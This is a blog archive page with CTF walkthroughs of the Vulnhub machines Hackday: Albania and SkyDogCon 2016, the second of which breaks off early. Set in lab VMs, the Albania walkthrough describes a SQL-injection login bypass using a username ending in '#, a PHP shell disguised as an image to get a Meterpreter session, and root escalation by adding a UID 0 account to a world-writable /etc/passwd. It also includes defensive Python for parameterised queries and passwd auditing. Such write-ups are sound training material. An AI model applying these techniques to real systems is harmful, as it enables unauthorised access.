Programming is SO incredibly important! I cannot stress this enough. How are operating systems made? By programming. How are programs/software made? By programming. How are exploits made and used? By programming. Nowadays there are so many different ways to learn how to program, from free online classes to free Android/iOS apps to YouTube videos. In fact, <a href="https://www.youtube.com/results?search_query=learn+how+to+program" target="_blank">here you go!</a> I recommend learning the basics in a high-level language such as PHP, Java, or C#. Once you have mastered one of those languages, move to Python, because you will be using this language A LOT. Once you've mastered Python, drop down to C and assembly. You can spend the rest of your life mastering C and assembly, plus I think they are the least intuitive for people learning to become hackers. If you're already familiar with programming in general, focus on Python, C, and assembly. Understanding these languages is what separates a good hacker from a great hacker.<br />
<br />
If you're a purist or traditionalist, you can certainly go backwards. Start at assembly and understand what an opcode is and what it does; you'll learn about registers and memory addresses, and you can certainly expect your head to hurt afterwards, but everything you learn later is just an abstraction on top of assembly. After assembly, you will learn to appreciate what C can do for you, and if it can't do something you need, you can always force assembly upon it with inline assembly! Python will allow you to script things out instead of writing a program and compiling it every time. Use Python to augment and script your C and assembly work.<br />
<br />
Full disclosure: I did not recommend every programming language you could use, and yes, these are the languages I am personally biased towards. You could learn Ruby, you could learn Perl, you could learn C++ or .NET or any other. Each has its benefits, and you should be familiar with all of them, but you will end up enjoying a select few languages based on personal preference.<br />
<br />
2. Information Gathering<br />
<br />
Even though this is the first step in the hacking methodology, it makes number 2 on our list, and you'll see why. This step is so critically important because the more information you can gather, the more likely you are to accomplish your goals. You need to find domains, IP addresses, email addresses, physical locations, what services they provide, what services they don't provide, and whether you can exploit them technically, socially, or physically. After gathering all this information, the actual hacking becomes laying down one train track after another to connect yourself straight to your target. Lots of people skip this step (including myself sometimes), and later, when they finally exploit their target, it's as a result of additional information gathering. You can never have too much information, especially in this day and age where computers can store and process most of it for you. DO NOT SKIP THIS STEP.<br />
<br />
1. Curiosity<br />
<br />
The single best skill a hacker can have is curiosity: the insatiable desire to learn how something works. This is how hackers find zero-day exploits: they know your product better than you do. They learn about your product, study your product, use your product, and then exploit your product. This curiosity does not stop at exploitation. It also extends to the other side of the house: offense if you're on defense, and defense if you're on offense. The only way to beat the adversary is to understand the adversary better than they understand themselves. If you're on defense, you understand how an attacker tries to exploit systems and you harden them. If you're on offense, you understand how defense hardens systems and work around those patches, configurations, and hardening strategies. I would further posit that a true hacker is curious about all things and not simply what he or she knows best. Some of the best findings over the years have come from the intersection of previously unrelated notions, ideas, and fields of study. This skill must be mastered above all else. Be curious, and if you're not curious about something, be curious about why you're not curious.<br />
<br />
These are the 5 fundamentals every hacker should master, offensive or defensive. Take these to heart and use them to better yourself.<br />
<br />
-Hack Responsibly, Hack Professionally.<br />
<br />
<br />
<br />
Posted by Austin (http://www.blogger.com/profile/01968094133955654942, noreply@blogger.com); comments: 1<br />
<br />
tag:blogger.com,1999:blog-918525977206186619.post-2647865392353274589, 2017-01-14T00:11:00.000-05:00 (updated 2017-01-14T00:11:13.103-05:00)<br />
<br />
Hackday: Albania Walkthrough<br />
<br />
Here we are for a walkthrough of Hackday: Albania. After booting it up in VirtualBox, I ran an Nmap scan that listed only port 22 open and a web server on port 8008. So when we browse to the web server we are greeted with Mr. Robot...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHjvsAosjdDIa_C5J8kwbubk5U2XIhBemPCKD-UNqcOQavctcIyVSYjgyabQhBVW54CK5jiowHUfqgYjY3iLGhp4bda3qPFAL5C_MHoPBvOssfrdUtl9BIoluDy4ZhflAbq9Hqo5OYZryq/s1600/webpage_home.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHjvsAosjdDIa_C5J8kwbubk5U2XIhBemPCKD-UNqcOQavctcIyVSYjgyabQhBVW54CK5jiowHUfqgYjY3iLGhp4bda3qPFAL5C_MHoPBvOssfrdUtl9BIoluDy4ZhflAbq9Hqo5OYZryq/s320/webpage_home.png" width="320" /></a></div>
I have no idea which language that is or what it says, so throwing it into Google Translate gives us: "If I am, I know where to go," and it is Albanian. Cool.<br />
<br />
So, I check the source and there is a comment, and I throw that into Google Translate as well: "Ok, Ok, but not here." Ok, the website is trolling me, ass. I don't see anything useful in the source, so I use dirbuster to see if there is anything else on this server. Something came back: a /js/ directory. So I navigated to it and found this...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiUSUxgAFkhtyqUUbPedCHWL9SkDYq_NTvFCKl2sHsToGGlJT2D3sr3Tv43a8khAeKW5Xc-qVV94OsVWZ9ZFl8p6jZ3qdPZkbZTYD4R4Inq16j_wrMNdwEyG3aMVlNx0TiwXmZ3ys3UX7/s1600/raptor_page_troll.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiUSUxgAFkhtyqUUbPedCHWL9SkDYq_NTvFCKl2sHsToGGlJT2D3sr3Tv43a8khAeKW5Xc-qVV94OsVWZ9ZFl8p6jZ3qdPZkbZTYD4R4Inq16j_wrMNdwEyG3aMVlNx0TiwXmZ3ys3UX7/s320/raptor_page_troll.png" width="320" /></a></div>
The translation is loosely, "Is it right or is directory jerk." So, since /js/ is a directory, I decide to recurse on the /js/ directory with dirbuster and I find /js/external and /js/images/. /js/external has a directory /jquery/ which contains jquery.js and seems to be the external version of the jquery.js file if needed. /js/images has a list of icon sets in different colors. Could be something, but I'm not sure yet. At this point, I'm kind of stuck, so I decide to use another scanner, Nikto, and holy crap, things appeared! Why? robots.txt. So I pulled it up on the web server...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6giPnaUpFoNgMGSSlovNa5t4w05gmLk7tUpjHspyInOQv2LdK5dR8ewt_zqPW67rB20YZRlkXqOSf0YzjeJk52PGcCL8JWiCI-7oeyV-KVD-5fmkr6YS7memUme_WwYBc0Ug_8K8fCmRo/s1600/robots_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6giPnaUpFoNgMGSSlovNa5t4w05gmLk7tUpjHspyInOQv2LdK5dR8ewt_zqPW67rB20YZRlkXqOSf0YzjeJk52PGcCL8JWiCI-7oeyV-KVD-5fmkr6YS7memUme_WwYBc0Ug_8K8fCmRo/s320/robots_txt.png" width="320" /></a></div>
<br />
A bunch of directories have been disallowed by the robots.txt file; however, none of them are trivial to type manually, so I want to find a tool that will scan these for me. I tried dirbuster and ZAP, but neither seemed to do searches based off the robots.txt file. So, I googled around and found wfuzz, which seemed to do the trick. I had never used wfuzz before, so I fumbled through the usage and eventually saw this in the help file...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0jC1vlDYdNJiUMOJT4bED-GgxUvysskw6gk0P3qP3eVhsF63F9FLaDrfFp-AmksBGy51S_1Fl73FWXjOlM4OgFQ0txpts6Fr8AV5XN0KI-9-6B4sy86X7O26SlH8EHeGvsoacWCIahYQ_/s1600/wfuzz_howto.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0jC1vlDYdNJiUMOJT4bED-GgxUvysskw6gk0P3qP3eVhsF63F9FLaDrfFp-AmksBGy51S_1Fl73FWXjOlM4OgFQ0txpts6Fr8AV5XN0KI-9-6B4sy86X7O26SlH8EHeGvsoacWCIahYQ_/s320/wfuzz_howto.png" width="320" /></a></div>
<br />
Which seemed to be exactly what I wanted (side note: I used wget to get a local copy of the robots.txt file and locally named it robots.txt). Then the results were...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPrIdqxiwSf-n2vuEIyVmNZpFPCjOtAx5FAwzV5_gHMXvWIRU84Y6eX7pxtK4AEsMxCrvCHKAieqbFKDI7P4iKvcId5EQX1_DIcH-vVIfx4kTtV3vy92SbXJaBEwM_6ua23Xxa7IXO4Mfh/s1600/odd_directory_robots_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPrIdqxiwSf-n2vuEIyVmNZpFPCjOtAx5FAwzV5_gHMXvWIRU84Y6eX7pxtK4AEsMxCrvCHKAieqbFKDI7P4iKvcId5EQX1_DIcH-vVIfx4kTtV3vy92SbXJaBEwM_6ua23Xxa7IXO4Mfh/s320/odd_directory_robots_txt.png" width="320" /></a></div>
<br />
This result is weird, so let's look at it. We found a new page!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxT2W2u4OG3V7eJdJhf0qUhBkCSxf0qYehEc9gAs3WP6zlLRH-uFthaQC01yg_Smwr_N3mhq4VViakyTvzAE0_lBSPWY3UUgnTWb7WKOn4mjGAplq_Gka9kC83tAtgmmlw1q27FgjKhx0g/s1600/is_there_vulnbank.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxT2W2u4OG3V7eJdJhf0qUhBkCSxf0qYehEc9gAs3WP6zlLRH-uFthaQC01yg_Smwr_N3mhq4VViakyTvzAE0_lBSPWY3UUgnTWb7WKOn4mjGAplq_Gka9kC83tAtgmmlw1q27FgjKhx0g/s320/is_there_vulnbank.png" width="320" /></a></div>
So I navigated to /uni.../vulnbank and I see there is a client folder in the vulnbank folder. Again, I follow the path and end up at the 'Very Secure Bank' client portal. Looks like some SQL injection is next. After trying some naive attempts at SQL injection, I decided that sqlmap would do this faster and better! Soooo here we go...sqlmap didn't give us great results, but the username field is vulnerable and it did get us the information that the back end database is MySQL. A good thing to know is that MySQL uses '#' as comments instead of '--' like I was using previously. So, I tried some more naive SQL injection attempts. Nothing worked. COME ON!<br />
<br />
Since the username is vulnerable, I figured I'd try and brute force the username with "'#" (single quote, pound sign) appended to the end to trigger the SQL injection vulnerability. I searched Kali and Google for a good list of usernames and tried some to no avail. Finally, I resorted to the ol' faithful rockyou.txt. It worked. It found jeff and hobson as two users. So I tried both of their usernames appended with '# and they worked!<br />
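The login bypass above comes down to how the query is built. As an added example (not code from the Hackday: Albania box or this post), here is the string-concatenated query beside a parameterised one, run on sqlite3 with a small helper, strip_mysql_hash_comment, that stands in for MySQL's '#' comment handling since sqlite3 has no such comment marker; the users table is constructed for the demo.<br />

```python
"""Added example: why a username of  hobson'#  logs in without a password
when the SQL is built by string concatenation, and why bound parameters
stop it. Runs on sqlite3 so it works offline; sqlite3 does not treat '#'
as a comment the way MySQL does, so strip_mysql_hash_comment() emulates
that part of MySQL's lexer. All data below is constructed for the demo."""
import sqlite3

# Constructed sample accounts; plaintext stand-ins, not real credentials.
USERS = [("jeff", "jeffs-secret"), ("hobson", "hobsons-secret")]


def make_db():
    """Build an in-memory users table from the constructed sample."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def strip_mysql_hash_comment(sql):
    """Emulate MySQL's '#' comment: discard everything from the first '#'
    that is NOT inside a single-quoted string literal (queries here are a
    single line, so 'to end of line' is 'to end of string')."""
    in_str = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_str = not in_str
        elif ch == "#" and not in_str:
            return sql[:i]
    return sql


def login_unsafe(conn, username, password):
    """Vulnerable pattern: user input pasted straight into the SQL text.
    With username  hobson'#  the closing quote ends the literal and the
    '#' comments out the whole  AND password='...'  clause."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    sql = strip_mysql_hash_comment(sql)  # what MySQL would really execute
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened pattern: bound parameters. The quote and '#' are just
    characters inside a value and never become part of the statement."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("unsafe, hobson'# :", login_unsafe(db, "hobson'#", "anything"))
    print("safe,   hobson'# :", login_safe(db, "hobson'#", "anything"))
```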
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF2Qwl3pW-DvZquEe4eP8lfge-KxonT0rYI0m-LtuFWes7atEikU7ya1dFbvNXqEgPR2gnCzZGfsc61CRLwsdRwUHQ5wklxoYnJmlfIfE-bSWinEhcCm7M8RGulov8-PcojxlCAOxhdc0W/s1600/hobson_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF2Qwl3pW-DvZquEe4eP8lfge-KxonT0rYI0m-LtuFWes7atEikU7ya1dFbvNXqEgPR2gnCzZGfsc61CRLwsdRwUHQ5wklxoYnJmlfIfE-bSWinEhcCm7M8RGulov8-PcojxlCAOxhdc0W/s320/hobson_username.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZU5GHQBd-akTXpqQzYyb8mMtHbSmVEJ1EiFy7xVu4hsB-_DXm0cU2Fy3x3ECUN4OGXR8P1ANlo5OxXHAIZys8IGR-yapriBSoBGwfgIeYaAcNy4EAAwgSgs8r_zB7iojetcrEltigfAl5/s1600/jeff_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZU5GHQBd-akTXpqQzYyb8mMtHbSmVEJ1EiFy7xVu4hsB-_DXm0cU2Fy3x3ECUN4OGXR8P1ANlo5OxXHAIZys8IGR-yapriBSoBGwfgIeYaAcNy4EAAwgSgs8r_zB7iojetcrEltigfAl5/s320/jeff_username.png" width="320" /></a></div>
<br />
<br />
Ok, there is a submission form on the right side, let's submit a test case and see what happens. Once we submit a test case, we see the message "After we got hacked we our allowing only image files to upload such as jpg, jpeg, bmp etc...". I haven't tried to upload an image yet, but obviously I need to try! I'm going to see if I can use the PHP shell in a jpg trick to get RCE.<br />
<br />
AAAAnd boom! Meterpreter shell.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzB-yOaokjtJtFYDMqljDj-vZ9imrVvcXVGXCo7sm1Bge6zbpGRNG4hzjxieiNeI_uszduDKSUcMMWVUMyDBitEr7WRLOXvQGtG5L-IsJOrnGXg8X-PFILgEbMax9hwQG7elSPSs2_ocMw/s1600/create_payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzB-yOaokjtJtFYDMqljDj-vZ9imrVvcXVGXCo7sm1Bge6zbpGRNG4hzjxieiNeI_uszduDKSUcMMWVUMyDBitEr7WRLOXvQGtG5L-IsJOrnGXg8X-PFILgEbMax9hwQG7elSPSs2_ocMw/s320/create_payload.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlyOhhIGwfmtLuCkTg30FWQ6RMANZLODgScsVY98WlZqPVgfah2lD7LE3NsdxfYlqODmFKlSDphE7UwKkk3BpRE8LMU1LzveosDUjhTctu0vfJgwmOsvakljqx7JdjBHX0sPJYaYoI5Qc/s1600/meterpreter_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLlyOhhIGwfmtLuCkTg30FWQ6RMANZLODgScsVY98WlZqPVgfah2lD7LE3NsdxfYlqODmFKlSDphE7UwKkk3BpRE8LMU1LzveosDUjhTctu0vfJgwmOsvakljqx7JdjBHX0sPJYaYoI5Qc/s320/meterpreter_shell.png" width="320" /></a></div>
<br />
Now that we have a shell, let's do some recon and escalate privs. First, I like to cat /etc/passwd and look for users...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmuQwe7TxhAq9bpIKlU-rEFiUWZ8uPQugVPpQxMC6nR8LE9awTzciNIMZmrYJzT0Trmr9KBADChuGp2znCZGBVFuZSzq_7Z_L3lbprrkBoP8Ahh5Th1KJbaJy_VeWh9_zds6hyvXnVB0Yu/s1600/taviso_user_etc_passwd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmuQwe7TxhAq9bpIKlU-rEFiUWZ8uPQugVPpQxMC6nR8LE9awTzciNIMZmrYJzT0Trmr9KBADChuGp2znCZGBVFuZSzq_7Z_L3lbprrkBoP8Ahh5Th1KJbaJy_VeWh9_zds6hyvXnVB0Yu/s320/taviso_user_etc_passwd.png" width="320" /></a></div>
<br />
So we found 'taviso'. I decided to also check which groups he is in (the meterpreter shell is not very stable but easily obtainable just by refreshing the ticket page in the web app), so I copied the file to my local machine and I see the following...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCULW0uLfINnTSJDazOrU1NzpB15obkKFJBI_EWEUU40Y8q8rfuvrohf6dpRYk6rOSpCYH9xl0yNetXVoH8_swBSpdGu8rz7mjS_erJwyB1tYY8Mcsa3ivZSgherIMc-EurZh9tDdJikCq/s1600/etc_group_taviso_sudo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCULW0uLfINnTSJDazOrU1NzpB15obkKFJBI_EWEUU40Y8q8rfuvrohf6dpRYk6rOSpCYH9xl0yNetXVoH8_swBSpdGu8rz7mjS_erJwyB1tYY8Mcsa3ivZSgherIMc-EurZh9tDdJikCq/s320/etc_group_taviso_sudo.png" width="320" /></a></div>
He's in the sudo group! Awesome! So, continuing my reconnaissance, I realized I overlooked something about the /etc/passwd file...it's world writable. What.<br />
<br />
Well, that makes everything much easier then. I decided to add my own root user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiENDehoZ2EPIHzDsbrwEXIqGFx2Syi-2m2pdtKS-gWiMSPA1LjiKg_meb0TOWhfHS_9l5FcQni3IC7DV3x6qNuxumASjayAkAcARU-kEAL01GsQmo1BEvN1kDPOnzdMbTmGn9Om6bpPq1/s1600/make_new_password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiENDehoZ2EPIHzDsbrwEXIqGFx2Syi-2m2pdtKS-gWiMSPA1LjiKg_meb0TOWhfHS_9l5FcQni3IC7DV3x6qNuxumASjayAkAcARU-kEAL01GsQmo1BEvN1kDPOnzdMbTmGn9Om6bpPq1/s320/make_new_password.png" width="320" /></a></div>
First, I created a password...it was 'password' as you can see. Next, I created the new user 'fabio'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWhZWgjxnXm4pOg8h_wVKUpvDZPFLX539ZzNGejKUForRPWsnwPK2ttrz1LzCSelA2c1twq4OA7qsGoUhUui1pyf81MfO2gdk7gAuTGtZF50V8gPFuHr0XKRe7YlYLukyIMIiSn7ImxcG3/s1600/new_etc_passwd_with_fabio.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWhZWgjxnXm4pOg8h_wVKUpvDZPFLX539ZzNGejKUForRPWsnwPK2ttrz1LzCSelA2c1twq4OA7qsGoUhUui1pyf81MfO2gdk7gAuTGtZF50V8gPFuHr0XKRe7YlYLukyIMIiSn7ImxcG3/s320/new_etc_passwd_with_fabio.png" width="320" /></a></div>
Since the file was editable, I simply said 'fabio' had a UID of 0 and a GID of 0, which means root privs!<br />
<br />
Lastly, all I had to do was switch users to fabio...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrsBHo9lfirpWo6L4-bkIM7LuTBfKZnmzGHSYo8CGoIyOn5Iqy_XhU4AfpuG7m4dLCCNa-RvP7dy73G-DD-ebFEiNQQuSlAtNmMxyTAwmdJoWgCvwcRgjyu-Axh-5Wtj3NVscKXrvZsfTg/s1600/have_root_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrsBHo9lfirpWo6L4-bkIM7LuTBfKZnmzGHSYo8CGoIyOn5Iqy_XhU4AfpuG7m4dLCCNa-RvP7dy73G-DD-ebFEiNQQuSlAtNmMxyTAwmdJoWgCvwcRgjyu-Axh-5Wtj3NVscKXrvZsfTg/s320/have_root_shell.png" width="320" /></a></div>
This included getting a TTY using python3 on the system. Now that I have root privs, let's finish this challenge.<br />
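Both conditions this escalation relied on, a world-writable /etc/passwd and a second UID 0 account, are cheap to audit for. The following is an added example, not from the box or this post: the passwd lines it parses are constructed, with a 'fabio' entry mirroring the one added above, and audit_passwd_file is a hypothetical helper for running the same checks against a real file.<br />

```python
"""Added example: detect the two weaknesses used above in the walkthrough,
a world-writable /etc/passwd and a non-root account with UID 0 (plus a
password hash placed directly in passwd, which is what a writable passwd
makes possible). The sample passwd content is constructed for the demo."""
import os
import stat

# Constructed sample: a trimmed /etc/passwd after a rogue entry was added.
# The hash in the 'fabio' line is a placeholder, not a real crypt(3) hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
taviso:x:1000:1000:taviso,,,:/home/taviso:/bin/bash
fabio:$1$saltsalt$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""


def parse_passwd(text):
    """Return one dict per well-formed passwd line (7 colon-separated fields).
    Malformed lines are reported rather than skipped: a corrupted passwd is
    itself worth a finding."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line %d: %r" % (lineno, line))
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def find_rogue_root_accounts(entries):
    """Flag any UID 0 account other than root, any entry carrying a real
    password hash in passwd instead of the 'x' shadow marker, and any empty
    password field (login without a password)."""
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append("%s: UID 0 account that is not root" % e["name"])
        pw = e["pw"]
        if pw == "":
            findings.append("%s: empty password field" % e["name"])
        elif pw != "x" and pw != "*" and not pw.startswith("!"):
            findings.append("%s: password hash stored in /etc/passwd" % e["name"])
    return findings


def world_writable(mode):
    """True when the 'other' write bit is set (e.g. 0o666 or 0o646); /etc/passwd
    should normally be 0o644."""
    return bool(mode & stat.S_IWOTH)


def audit_passwd_file(path):
    """Hypothetical helper: run both checks against a real passwd file and
    return the combined list of findings (empty list means nothing found)."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if world_writable(mode):
        findings.append("%s is world-writable (mode %o)" % (path, mode))
    with open(path) as fh:
        findings.extend(find_rogue_root_accounts(parse_passwd(fh.read())))
    return findings


if __name__ == "__main__":
    for finding in find_rogue_root_accounts(parse_passwd(SAMPLE_PASSWD)):
        print("FINDING:", finding)
```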
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1xlgY1bMZPrdP6MSIRLeLKeWQhXUKdxMOmUFcJH872x41UnAk2KX5nLxcOWe9hC7T-D-am05uBh0Nkpjoj0apUQ2f9dEEshKeRjSyOc0JH13jjxJ7NABAleVoVqo4ISE-nKOuIsSjEVfX/s1600/final_flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1xlgY1bMZPrdP6MSIRLeLKeWQhXUKdxMOmUFcJH872x41UnAk2KX5nLxcOWe9hC7T-D-am05uBh0Nkpjoj0apUQ2f9dEEshKeRjSyOc0JH13jjxJ7NABAleVoVqo4ISE-nKOuIsSjEVfX/s320/final_flag.png" width="320" /></a></div>
<br />
There we go. I hope this helped you out! I realize there are many walkthroughs for this challenge and I hope mine gave you something you might not have received elsewhere while you were learning from this challenge. <b>Full Disclosure: I had issues with meterpreter and running the 'shell' command inside of meterpreter because the VM had run out of memory. If you find you're running into a similar issue, try restarting the VM and it should fix that issue.</b><br />
<br />
-Hack Responsibly. Hack Professionally.<br />
<br />
Over 1000 Page Views! (posted by Austin, 2016-11-21)<br />
<br />
This is neither a professional development nor a security related post. I would like to thank everyone that has visited my blog and has benefited from my contributions to the infosec community! I am so excited that my blog has finally reached over 1000 lifetime page views and here is to the next 1000 page views! -Hack Responsibly, Hack Professionally<br />
<br />
Vulnhub - SkyDogCon CTF 2016 Walkthrough (posted by Austin, 2016-11-21)<br />
<br />
Welcome back, here's my walkthrough of the SkyDogCon CTF 2016 as posted on Vulnhub. My thoughts and comments are my own and do not represent anyone else's unless explicitly stated. So, without further ado, let's begin.<br />
<br />
Of course, we start out with an nmap scan and get some decent results.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMAfwR-zVmkltLV0ukuRac3YN17rzqC4ACOtbYnO-6LlGjpE_A8o61gu56OB7rGaM4S6ZTrvcbw071NrZpfs7SCW_W5aFLVZd6e2dcyuiPz7_Jlwyjjq-nQv6R63I-Yb4h0LzZ9VZD7YCC/s1600/nmap_all_ports.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMAfwR-zVmkltLV0ukuRac3YN17rzqC4ACOtbYnO-6LlGjpE_A8o61gu56OB7rGaM4S6ZTrvcbw071NrZpfs7SCW_W5aFLVZd6e2dcyuiPz7_Jlwyjjq-nQv6R63I-Yb4h0LzZ9VZD7YCC/s320/nmap_all_ports.png" width="320" /></a></div>
<br />
Now, let's check out the web server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAVNytP9_sIfqxzBgS56XJrque1MFfso5ZPsD2sEaKdZQNHzF9FMm8y1oe39mq7E6f5pP73ybi8sGfTP6W6sBNz705V1UYvX1VVktT4Ktxwm2gj6z-iIQ6JhZuOBzrIY7Y8A503CHUDdb/s1600/skydogcon_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAVNytP9_sIfqxzBgS56XJrque1MFfso5ZPsD2sEaKdZQNHzF9FMm8y1oe39mq7E6f5pP73ybi8sGfTP6W6sBNz705V1UYvX1VVktT4Ktxwm2gj6z-iIQ6JhZuOBzrIY7Y8A503CHUDdb/s320/skydogcon_webpage.png" width="320" /></a></div>
Looks pretty cool. One comment jumped out at me, so I made note of it and decided to continue on with fuzzing web directories using dirbuster. I found a forbidden directory called /personnel and it accused me of not coming from an FBI workstation...the nerve...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_nvSEMnyU1u05d6-xc05mef5DrztKCXOfzMBbzfrkCDg5BvPknonD10JKHsElrKVN3f-FGkaZMya0FeYumKTLjOayjdYQS7x9VvwZOauTncvcIxdoYozjYTxmmm9RfEixt1YmWZr8GeBE/s1600/not_fbi_workstation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_nvSEMnyU1u05d6-xc05mef5DrztKCXOfzMBbzfrkCDg5BvPknonD10JKHsElrKVN3f-FGkaZMya0FeYumKTLjOayjdYQS7x9VvwZOauTncvcIxdoYozjYTxmmm9RfEixt1YmWZr8GeBE/s320/not_fbi_workstation.png" width="320" /></a></div>
<br />
Nikto didn't return anything useful, so let's check out this comment with a suspicious directory. This looks like a lot of javascript gibberish, but at the very top is a series of letters and numbers. None of the letters are higher than f, so this may be hexadecimal. So, I decode it and it's the first flag!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
